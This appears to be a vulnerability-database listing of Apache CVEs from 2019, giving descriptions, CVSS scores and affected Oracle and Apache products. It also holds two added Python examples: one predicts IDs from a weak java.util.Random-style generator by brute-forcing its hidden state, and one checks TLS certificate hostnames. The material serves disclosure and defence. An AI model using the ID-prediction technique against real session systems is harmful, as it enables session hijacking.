CVE-2019-0227 MEDIUM

A Server Side Request Forgery (SSRF) vulnerability affected the Apache Axis 1.4 distribution that was last released in 2006. Security and bug-fix commits continue in the project's Axis 1.x Subversion repository; legacy users are encouraged to build from source. The successor to Axis 1.x is Axis2; its latest version is 1.7.9 and is not vulnerable to this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H 1.6 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-918,

Products Affected

Vendor Product Version
oracle communications_design_studio 7.3.4.3.0
apache axis 1.4
oracle communications_order_and_service_management 7.3.0.0.0
oracle communications_design_studio 7.4.0.4.0
oracle secure_global_desktop 5.4
oracle agile_engineering_data_management 6.2.1.0
oracle enterprise_manager_base_platform 13.3.0.0
oracle internet_directory 12.2.1.3.0
oracle policy_automation_connector_for_siebel 10.4.6
oracle communications_design_studio 7.4.1.1.0
oracle communications_element_manager 8.1.1
oracle secure_global_desktop 5.5
oracle flexcube_core_banking 11.10.0
oracle primavera_unifier *
oracle primavera_gateway 17.12.6
oracle tuxedo 12.1.1.0.0
oracle communications_element_manager 8.1.0
oracle hospitality_guest_access 4.2.0
oracle instantis_enterprisetrack 17.3
oracle peoplesoft_enterprise_peopletools 8.57
oracle tuxedo 12.1.3
oracle agile_product_lifecycle_management 9.3.3
oracle siebel_ui_framework *
oracle flexcube_core_banking 11.9.0
oracle webcenter_portal 12.2.1.3.0
oracle enterprise_manager_for_fusion_middleware 12.1.0.5
oracle primavera_unifier 18.8
oracle primavera_unifier 16.1
oracle big_data_discovery 1.6
oracle communications_design_studio 7.3.5.5.0
oracle communications_session_route_manager 8.0.0
oracle application_testing_suite 13.3.0.1
oracle primavera_unifier 19.12
oracle internet_directory 12.2.1.4.0
oracle knowledge *
oracle endeca_information_discovery_studio 3.2.0
oracle enterprise_manager_base_platform 12.1.0.5
oracle flexcube_private_banking 12.1.0
oracle financial_services_compliance_regulatory_reporting *
oracle communications_session_route_manager 8.1.1
oracle financial_services_analytical_applications_infrastructure *
oracle peoplesoft_enterprise_human_capital_management_human_resources 7.3.6
oracle communications_order_and_service_management 7.4
oracle instantis_enterprisetrack 17.1
oracle communications_session_report_manager 8.0.0
oracle hospitality_guest_access 4.2.1
oracle application_testing_suite 13.2.0.1
oracle communications_session_report_manager 8.1.0
oracle real-time_decision_server 3.2.1.0
oracle communications_element_manager 8.0.0
oracle peoplesoft_enterprise_human_capital_management_human_resources 9.2
oracle communications_session_report_manager 8.2.0
oracle primavera_unifier 16.2
oracle rapid_planning 12.1
oracle peoplesoft_enterprise_peopletools 8.58
oracle communications_asap_cartridges 7.2
oracle retail_xstore_point_of_service 7.1
oracle peoplesoft_enterprise_human_capital_management_human_resources 7.3.5
oracle communications_session_route_manager 8.2.0
oracle flexcube_private_banking 12.0.0
oracle retail_order_broker 15.0
oracle communications_network_integrity 7.3.6
oracle communications_asap_cartridges 7.3
oracle communications_session_report_manager 8.1.1
oracle retail_order_broker 16.0
oracle financial_services_funds_transfer_pricing *
oracle agile_product_lifecycle_management_framework 9.3.3
oracle communications_element_manager 8.2.0
oracle peoplesoft_enterprise_peopletools 8.56
oracle primavera_gateway 16.2.11
oracle communications_session_route_manager 8.1.0
oracle flexcube_core_banking 11.8.0
oracle instantis_enterprisetrack 17.2
oracle retail_order_broker 18.0
oracle flexcube_core_banking 11.7.0
oracle rapid_planning 12.2
oracle communications_network_integrity 7.3.5
CVE-2019-0228 HIGH

Apache PDFBox 2.0.14 does not properly initialize the XML parser, which allows context-dependent attackers to conduct XML External Entity (XXE) attacks via a crafted XFDF.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-611,

Products Affected

Vendor Product Version
oracle peoplesoft_enterprise_peopletools 8.59
oracle webcenter_sites 12.2.1.4.0
oracle banking_corporate_lending_process_management 14.5
oracle banking_corporate_lending_process_management 14.3
oracle retail_xstore_point_of_service 17.0
oracle hyperion_financial_reporting 11.2.6.0
oracle banking_virtual_account_management 14.5
oracle banking_virtual_account_management 14.2
oracle communications_session_report_manager *
oracle peoplesoft_enterprise_peopletools 8.58
oracle retail_xstore_point_of_service 18.0.3
fedoraproject fedora 29
oracle retail_xstore_point_of_service 16.0.6
oracle banking_trade_finance_process_management 14.3
oracle banking_credit_facilities_process_management 14.5
oracle banking_trade_finance_process_management 14.5
oracle banking_corporate_lending_process_management 14.2
oracle banking_trade_finance_process_management 14.2
apache james 3.4.0
oracle banking_credit_facilities_process_management 14.2
oracle hyperion_financial_reporting 11.1.2.4
oracle banking_supply_chain_finance 14.3
apache james 3.3.0
fedoraproject fedora 30
oracle webcenter_sites 12.2.1.3.0
oracle banking_supply_chain_finance 14.2
apache pdfbox 2.0.14
oracle communications_messaging_server 8.1
oracle banking_virtual_account_management 14.3.0
oracle banking_supply_chain_finance 14.5
oracle banking_credit_facilities_process_management 14.3
CVE-2019-0229 MEDIUM

A number of HTTP endpoints in the Airflow webserver (both RBAC and classic) did not have adequate protection and were vulnerable to cross-site request forgery attacks.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-352,

Products Affected

Vendor Product Version
apache airflow *
CVE-2019-0230 HIGH

In Apache Struts 2.0.0 to 2.5.20, forced double OGNL evaluation, when performed on raw user input in tag attributes, may lead to remote code execution.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-1321,

Products Affected

Vendor Product Version
apache struts *
oracle communications_policy_management 12.5.0
oracle financial_services_market_risk_measurement_and_management 8.0.6
oracle financial_services_data_integration_hub 8.0.3
oracle mysql_enterprise_monitor *
oracle financial_services_data_integration_hub 8.0.6
CVE-2019-0231 MEDIUM

Handling of the close_notify SSL/TLS message does not lead to a connection closure, leaving the server with the socket still open and potentially allowing the client to receive clear-text messages afterward. Mitigation: 2.0.20 users should migrate to 2.0.21, 2.1.0 users should migrate to 2.1.1. This issue affects: Apache MINA.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-319,

Products Affected

Vendor Product Version
apache mina 2.1.1
apache mina 2.0.20
CVE-2019-0232 HIGH

When running on Windows with enableCmdLineArguments enabled, the CGI Servlet in Apache Tomcat 9.0.0.M1 to 9.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 is vulnerable to Remote Code Execution due to a bug in the way the JRE passes command line arguments to Windows. The CGI Servlet is disabled by default. The CGI option enableCmdLineArguments is disabled by default in Tomcat 9.0.x (and will be disabled by default in all versions in response to this vulnerability). For a detailed explanation of the JRE behaviour, see Markus Wulftange's blog (https://codewhitesec.blogspot.com/2016/02/java-and-command-line-injections-in-windows.html) and this archived MSDN blog (https://web.archive.org/web/20161228144344/https://blogs.msdn.microsoft.com/twistylittlepassagesallalike/2011/04/23/everyone-quotes-command-line-arguments-the-wrong-way/).

CVSS 2.0

Severity: HIGH

Problem Type: CWE-78,

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 9.0.0
CVE-2019-0233 MEDIUM

An access permission override in Apache Struts 2.0.0 to 2.5.20 may cause a Denial of Service when performing a file upload.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-281,

Products Affected

Vendor Product Version
apache struts *
oracle communications_policy_management 12.5.0
oracle financial_services_market_risk_measurement_and_management 8.0.6
oracle financial_services_data_integration_hub 8.0.3
oracle mysql_enterprise_monitor *
oracle financial_services_data_integration_hub 8.0.6
CVE-2019-0234 MEDIUM

A Reflected Cross-site Scripting (XSS) vulnerability exists in Apache Roller. Roller's Math Comment Authenticator did not properly sanitize user input and could be exploited to perform Reflected Cross Site Scripting (XSS). The mitigation for this vulnerability is to upgrade to the latest version of Roller, which is now Roller 5.2.3.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache roller 5.2.1
apache roller 5.2.2
apache roller 5.2.0
CVE-2019-0235 MEDIUM

Apache OFBiz 17.12.01 is vulnerable to some CSRF attacks.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-352,

Products Affected

Vendor Product Version
apache ofbiz 17.12.01
CVE-2019-10070 MEDIUM

Apache Atlas versions 0.8.3 and 1.1.0 were found vulnerable to Stored Cross-Site Scripting in the search functionality.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache atlas 1.1.0
apache atlas 0.8.3
CVE-2019-10071 MEDIUM

The code which checks HMAC in form submissions used String.equals() for comparisons, which results in a timing side channel for the comparison of the HMAC signatures. This could lead to remote code execution if an attacker is able to determine the correct signature for their payload. The comparison should be done with a constant time algorithm instead.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-203,

Products Affected

Vendor Product Version
apache tapestry *
CVE-2019-10072 MEDIUM

The fix for CVE-2019-0199 was incomplete and did not address HTTP/2 connection window exhaustion on write in Apache Tomcat versions 9.0.0.M1 to 9.0.19 and 8.5.0 to 8.5.40. By not sending WINDOW_UPDATE messages for the connection window (stream 0), clients were able to cause server-side threads to block, eventually leading to thread exhaustion and a DoS.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-667,

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 9.0.0
CVE-2019-10073 MEDIUM

The "Blog", "Forum", "Contact Us" screens of the template "ecommerce" application bundled in Apache OFBiz are vulnerable to Stored XSS attacks. Mitigation: Upgrade to 16.11.06 or manually apply the following commits on branch 16.11: 1858438, 1858543, 1860595 and 1860616.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2019-10074 HIGH

An RCE is possible by entering Freemarker markup in an Apache OFBiz Form Widget textarea field when encoding has been disabled on such a field. This was the case for the Customer Request "story" input in the Order Manager application. Encoding should not be disabled without good reason and never within a field that accepts user input. Mitigation: Upgrade to 16.11.06 or manually apply the following commit on branch 16.11: r1858533.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-74,CWE-116,

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2019-10076 MEDIUM

A carefully crafted malicious attachment could trigger an XSS vulnerability on Apache JSPWiki 2.9.0 to 2.11.0.M3, which could lead to session hijacking.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache jspwiki *
apache jspwiki 2.11.0
CVE-2019-10077 MEDIUM

A carefully crafted InterWiki link could trigger an XSS vulnerability on Apache JSPWiki 2.9.0 to 2.11.0.M3, which could lead to session hijacking.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache jspwiki *
apache jspwiki 2.11.0
CVE-2019-10078 MEDIUM

A carefully crafted plugin link invocation could trigger an XSS vulnerability on Apache JSPWiki 2.9.0 to 2.11.0.M3, which could lead to session hijacking. Initial reporting indicated ReferredPagesPlugin, but further analysis showed that multiple plugins were vulnerable.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache jspwiki *
apache jspwiki 2.11.0
CVE-2019-10079 MEDIUM

Apache Traffic Server is vulnerable to HTTP/2 setting flood attacks. Earlier versions of Apache Traffic Server didn't limit the number of setting frames sent from the client using the HTTP/2 protocol. Users should upgrade to Apache Traffic Server 7.1.7, 8.0.4, or later versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-770,

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2019-10080 MEDIUM

The XMLFileLookupService in NiFi versions 1.3.0 to 1.9.2 allowed trusted users to inadvertently configure a potentially malicious XML file. The XML file has the ability to make external calls to services (via XXE) and reveal information such as the versions of Java, Jersey, and Apache that the NiFi instance uses.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache nifi *
CVE-2019-10081 MEDIUM

HTTP/2 (2.4.20 through 2.4.39) very early pushes, for example configured with "H2PushResource", could lead to an overwrite of memory in the pushing request's pool, leading to crashes. The memory copied is that of the configured push link header values, not data supplied by the client.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-787,

Products Affected

Vendor Product Version
apache http_server *
debian debian_linux 9.0
debian debian_linux 10.0
CVE-2019-10082 MEDIUM

In Apache HTTP Server 2.4.18-2.4.39, using fuzzed network input, the http/2 session handling could be made to read memory after being freed, during connection shutdown.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H 3.9 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-416,

Products Affected

Vendor Product Version
apache http_server *
oracle instantis_enterprisetrack *
oracle http_server 12.2.1.3.0
oracle http_server 12.2.1.4.0
oracle enterprise_manager_ops_center 12.4.0
oracle enterprise_manager_ops_center 12.4.0.0
oracle enterprise_manager_ops_center 12.3.3
oracle communications_element_manager 8.2.0
oracle communications_element_manager 8.0.0
oracle communications_element_manager 8.1.1
oracle retail_xstore_point_of_service 7.1
oracle communications_element_manager 8.1.0
CVE-2019-10083 MEDIUM

When updating a Process Group via the API in NiFi versions 1.3.0 to 1.9.2, the response to the request includes all of its contents (at the top most level, not recursively). The response included details about processors and controller services which the user may not have had read access to.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache nifi *
CVE-2019-10084 MEDIUM

In Apache Impala 2.7.0 to 3.2.0, an authenticated user with access to the IDs of active Impala queries or sessions can interact with those sessions or queries via a specially-constructed request and thereby potentially bypass authorization and audit mechanisms. Session and query IDs are unique and random, but have not been documented or consistently treated as sensitive secrets. Therefore they may be exposed in logs or interfaces. They were also not generated with a cryptographically secure random number generator, so are vulnerable to random number generator attacks that predict future IDs based on past IDs. Impala deployments with Apache Sentry or Apache Ranger authorization enabled may be vulnerable to privilege escalation if an authenticated attacker is able to hijack a session or query from another authenticated user with privileges not assigned to the attacker. Impala deployments with audit logging enabled may be vulnerable to incorrect audit logging as a user could undertake actions that were logged under the name of a different authenticated user. Constructing an attack requires a high degree of technical sophistication and access to the Impala system as an authenticated user.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H 1.6 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-311,CWE-330,CWE-384,CWE-532,CWE-732,

Products Affected

Vendor Product Version
apache impala *
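
The Impala entry above makes two separable points: IDs leak through logs and interfaces, and they come from a non-cryptographic generator, so leaked IDs let an attacker predict future ones. The following Python example is added here to show the second point concretely; it is not Impala code, and since the advisory does not name the generator Impala used, a java.util.Random-style 48-bit LCG stands in for it (the seed, multiplier and scrambling constants below are java.util.Random's, the `WeakIdGenerator` class is this example's own). Two consecutive 32-bit IDs are enough to brute-force the 16 hidden state bits and predict the third, whereas IDs drawn from the OS CSPRNG via `secrets` give an attacker nothing to work with.

```python
import secrets

# java.util.Random's 48-bit linear congruential generator (LCG) constants.
# Stand-in for "not a cryptographically secure RNG"; Impala's actual generator
# is not described in the advisory, so treat this as illustrative.
LCG_MULT = 0x5DEECE66D
LCG_INC = 0xB
LCG_MASK = (1 << 48) - 1


class WeakIdGenerator:
    """Emits 32-bit IDs taken from the top 32 bits of a 48-bit LCG state."""

    def __init__(self, seed: int):
        # Same initial scrambling java.util.Random applies to a caller-supplied seed.
        self.state = (seed ^ LCG_MULT) & LCG_MASK

    def next_id(self) -> int:
        self.state = (self.state * LCG_MULT + LCG_INC) & LCG_MASK
        return self.state >> 16  # 32-bit output: leaks 32 of the 48 state bits


def recover_state(id1: int, id2: int):
    """Given two consecutive outputs, brute-force the 16 hidden state bits.

    Returns the full 48-bit state *after* id2 was produced, or None if the two
    values are not consecutive outputs of this generator."""
    for low in range(1 << 16):
        candidate = (id1 << 16) | low
        nxt = (candidate * LCG_MULT + LCG_INC) & LCG_MASK
        if nxt >> 16 == id2:
            return nxt
    return None


def predict_next_id(id1: int, id2: int) -> int:
    """Predict the ID that will follow id1, id2 (the 'future IDs from past IDs' attack)."""
    state = recover_state(id1, id2)
    if state is None:
        raise ValueError("outputs are not consecutive LCG outputs")
    return ((state * LCG_MULT + LCG_INC) & LCG_MASK) >> 16


def secure_id() -> str:
    """What a session/query ID should look like: 128 bits from the OS CSPRNG."""
    return secrets.token_hex(16)


def demo() -> bool:
    """Returns True when the third ID was predicted from the first two."""
    gen = WeakIdGenerator(seed=20190401)  # constructed seed for the demo
    first, second, third = gen.next_id(), gen.next_id(), gen.next_id()
    return predict_next_id(first, second) == third
```

The brute force is 65536 iterations, well under a second in CPython; a generator with a larger hidden state only raises the cost, it does not remove the attack. The mitigation the advisory implies is both parts: generate IDs with a CSPRNG, and stop writing them to logs and interfaces in the first place.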
CVE-2019-10085 MEDIUM

In Apache Allura prior to 1.11.0, a vulnerability exists for stored XSS on the user dropdown selector when creating or editing tickets. The XSS executes when a user engages with that dropdown on that page.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache allura *
CVE-2019-10086 HIGH

In Apache Commons Beanutils 1.9.2, a special BeanIntrospector class was added which allows suppressing the ability for an attacker to access the classloader via the class property available on all Java objects. However, PropertyUtilsBean did not use this introspector by default, so the class property remained reachable unless the application registered it explicitly; 1.9.4 enables the suppression by default.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.3 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L 3.9 3.4

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
oracle retail_price_management 15.0
oracle weblogic_server 10.3.6.0.0
oracle jd_edwards_enterpriseone_orchestrator *
oracle communications_unified_inventory_management 7.4.0
oracle communications_billing_and_revenue_management_elastic_charging_engine 12.0.0.3
oracle utilities_framework 4.4.0.0.0
oracle fusion_middleware 12.2.1.4.0
oracle retail_central_office 14.1
oracle insurance_data_gateway 1.0.2.3
oracle agile_plm 9.3.3
oracle time_and_labor *
oracle service_bus 11.1.1.9.0
oracle communications_cloud_native_core_unified_data_repository 1.6.0
oracle retail_returns_management 14.1
oracle agile_product_lifecycle_management_integration_pack 3.6
oracle communications_unified_inventory_management 7.3.5
oracle peoplesoft_enterprise_pt_peopletools 8.57
oracle peoplesoft_enterprise_pt_peopletools 8.58
oracle retail_invoice_matching 16.0.3
oracle communications_billing_and_revenue_management 7.5
oracle retail_price_management 14.0
oracle communications_evolved_communications_application_server 7.1
oracle utilities_framework 4.2.0.2.0
fedoraproject fedora 30
oracle retail_back_office 14.1
oracle retail_price_management 16.0
oracle fusion_middleware 11.1.1.9
oracle service_bus 12.2.1.4.0
oracle hospitality_opera_5 5.5
redhat enterprise_linux_server 7.0
oracle communications_metasolv_solution 6.3.0
oracle communications_design_studio 7.3.5
oracle communications_cloud_native_core_policy 1.9.0
oracle retail_price_management 14.0.1
oracle communications_unified_inventory_management 7.3.4
oracle customer_management_and_segmentation_foundation 18.0
oracle communications_pricing_design_center 12.0.0.3.0
oracle communications_performance_intelligence_center 10.4.0.3
oracle flexcube_private_banking 12.0.0
oracle healthcare_foundation 7.1.5
opensuse leap 15.0
apache nifi 1.15.0
oracle utilities_framework 4.4.0.3.0
oracle enterprise_manager_for_virtualization 13.4.0.0
oracle peoplesoft_enterprise_pt_peopletools 8.56
oracle service_bus 12.2.1.3.0
apache nifi 1.14.0
redhat enterprise_linux_server_aus 7.7
fedoraproject fedora 31
oracle communications_billing_and_revenue_management_elastic_charging_engine 11.3.0.9
oracle jd_edwards_enterpriseone_orchestrator 9.2.5.3
oracle jd_edwards_enterpriseone_tools 9.2.5.3
oracle communications_convergence 3.0.2.2.0
oracle communications_metasolv_solution 6.3.1
oracle jd_edwards_enterpriseone_tools *
oracle retail_merchandising_system 5.0.3.1
oracle primavera_gateway *
oracle retail_xstore_point_of_service 18.0
oracle healthcare_foundation 7.2.2
oracle retail_xstore_point_of_service 16.0
oracle agile_product_lifecycle_management_integration_pack 3.5
oracle agile_plm 9.3.6
oracle utilities_framework 4.2.0.3.0
oracle hospitality_opera_5 5.6
oracle blockchain_platform *
oracle financial_services_revenue_management_and_billing_analytics 2.7
oracle peoplesoft_enterprise_peopletools 8.57
oracle retail_advanced_inventory_planning 14.1
apache commons_beanutils *
debian debian_linux 8.0
oracle application_testing_suite 13.3.0.1
oracle solaris_cluster 4.4
redhat enterprise_linux_server_tus 7.7
oracle banking_platform 2.9.0
oracle healthcare_foundation 8.0.1
oracle banking_platform 2.7.1
oracle flexcube_private_banking 12.1.0
oracle utilities_framework 4.4.0.2.0
oracle communications_design_studio 7.4.0
oracle retail_predictive_application_server 16.0
opensuse leap 15.1
oracle retail_xstore_point_of_service 17.0
oracle financial_services_revenue_management_and_billing_analytics 2.8
oracle healthcare_foundation 7.3.0
oracle communications_unified_inventory_management 7.4.1
oracle real-time_decisions_solutions 3.2.0.0
oracle utilities_framework *
oracle communications_cloud_native_core_console 1.4.0
oracle healthcare_foundation 7.3.1
oracle agile_plm 9.3.5
oracle retail_xstore_point_of_service 7.1
oracle retail_xstore_point_of_service 15.0
redhat enterprise_linux_desktop 7.0
redhat enterprise_linux_workstation 7.0
redhat enterprise_linux_eus 7.7
oracle communications_network_integrity 7.3.6
oracle communications_billing_and_revenue_management 12.0.0.3.0
oracle hospitality_reporting_and_analytics 9.1.0
redhat jboss_enterprise_application_platform 7.2.0
oracle peoplesoft_enterprise_peopletools 8.56
oracle fusion_middleware 12.2.1.3.0
oracle retail_point-of-service 14.1
oracle communications_design_studio 7.3.4
oracle banking_platform 2.4.0
CVE-2019-10087 MEDIUM

On Apache JSPWiki, up to version 2.11.0.M4, a carefully crafted plugin link invocation could trigger an XSS vulnerability on Apache JSPWiki, related to the Page Revision History, which could allow the attacker to execute javascript in the victim's browser and get some sensitive information about the victim.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache jspwiki *
apache jspwiki 2.11.0
CVE-2019-10088 MEDIUM

A carefully crafted or corrupt zip file can cause an OOM in Apache Tika's RecursiveParserWrapper in versions 1.7-1.21. Users should upgrade to 1.22 or later.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-770,

Products Affected

Vendor Product Version
apache tika *
CVE-2019-10089 MEDIUM

On Apache JSPWiki, up to version 2.11.0.M4, a carefully crafted plugin link invocation could trigger an XSS vulnerability on Apache JSPWiki, related to the WYSIWYG editor, which could allow the attacker to execute javascript in the victim's browser and get some sensitive information about the victim.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache jspwiki *
apache jspwiki 2.11.0
CVE-2019-10090 MEDIUM

On Apache JSPWiki, up to version 2.11.0.M4, a carefully crafted plugin link invocation could trigger an XSS vulnerability on Apache JSPWiki, related to the plain editor, which could allow the attacker to execute javascript in the victim's browser and get some sensitive information about the victim.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache jspwiki *
apache jspwiki 2.11.0
CVE-2019-10091 MEDIUM

When TLS is enabled with ssl-endpoint-identification-enabled set to true, Apache Geode fails to perform hostname verification of the entries in the certificate SAN during the SSL handshake. This could compromise intra-cluster communication using a man-in-the-middle attack.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.4 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N 2.2 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-295,

Products Affected

Vendor Product Version
apache geode 1.9.0
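
The Geode entry is a reminder that a TLS handshake with a valid chain is not enough: the peer's certificate also has to name the host you meant to talk to, via its Subject Alternative Name entries. The Python example below is added here to make that check explicit; it is not Geode's code (Geode is Java, where the equivalent is enabling endpoint identification on the SSLParameters of the engine). The two certificates are constructed, in the dict shape `ssl.SSLSocket.getpeercert()` returns, and the matching rules follow RFC 6125: case-insensitive, wildcard only as the whole left-most label, IP literals only against iPAddress entries, and the subject CN consulted only when there is no SAN at all.

```python
import ipaddress

# Constructed certificates in the dict shape returned by ssl.SSLSocket.getpeercert().
CLUSTER_CERT = {
    "subject": ((("commonName", "locator.geode.internal"),),),
    "subjectAltName": (
        ("DNS", "*.geode.internal"),
        ("DNS", "geode.internal"),
        ("IP Address", "10.0.0.5"),
    ),
}
# SAN and CN disagree: a verifier that still consults the CN would accept the wrong host.
CN_MISMATCH_CERT = {
    "subject": ((("commonName", "admin.example.com"),),),
    "subjectAltName": (("DNS", "api.example.com"),),
}


def _parse_ip(text):
    try:
        return ipaddress.ip_address(text)
    except ValueError:
        return None


def _dns_name_match(pattern: str, hostname: str) -> bool:
    """RFC 6125-style dNSName matching: case-insensitive, a wildcard is only
    allowed as the whole left-most label and never spans a dot."""
    pattern = pattern.lower().rstrip(".")
    hostname = hostname.lower().rstrip(".")
    if "*" not in pattern:
        return pattern == hostname
    p_labels, h_labels = pattern.split("."), hostname.split(".")
    if p_labels[0] != "*" or len(p_labels) < 3:  # reject "*" and "*.com"
        return False
    if len(p_labels) != len(h_labels) or h_labels[0] == "":
        return False
    return p_labels[1:] == h_labels[1:]


def verify_hostname(cert: dict, hostname: str) -> bool:
    """Return True only if `hostname` is named by the certificate.

    IP literals must match an iPAddress SAN; DNS names must match a dNSName SAN;
    the subject CN is consulted only when the certificate carries no SAN at all."""
    san = cert.get("subjectAltName", ())
    dns_names = [v for k, v in san if k == "DNS"]
    ip_names = [_parse_ip(v) for k, v in san if k == "IP Address"]
    ip = _parse_ip(hostname)
    if ip is not None:
        return any(ip == candidate for candidate in ip_names if candidate is not None)
    if dns_names or ip_names:
        return any(_dns_name_match(p, hostname) for p in dns_names)
    for rdn in cert.get("subject", ()):  # legacy CN fallback, no SAN present
        for key, value in rdn:
            if key == "commonName":
                return _dns_name_match(value, hostname)
    return False
```

In a real client this check runs after chain validation and before any application data is sent; skipping it, as the advisory describes, means any certificate from the same CA (or any certificate the cluster trusts) can impersonate any member.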
CVE-2019-10092 MEDIUM

In Apache HTTP Server 2.4.0-2.4.39, a limited cross-site scripting issue was reported affecting the mod_proxy error page. An attacker could cause the link on the error page to be malformed and instead point to a page of their choice. This would only be exploitable where a server was set up with proxying enabled but was misconfigured in such a way that the Proxy Error page was displayed.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
canonical ubuntu_linux 19.04
apache http_server *
netapp clustered_data_ontap *
canonical ubuntu_linux 18.04
opensuse leap 15.0
oracle secure_global_desktop 5.4
debian debian_linux 9.0
opensuse leap 15.1
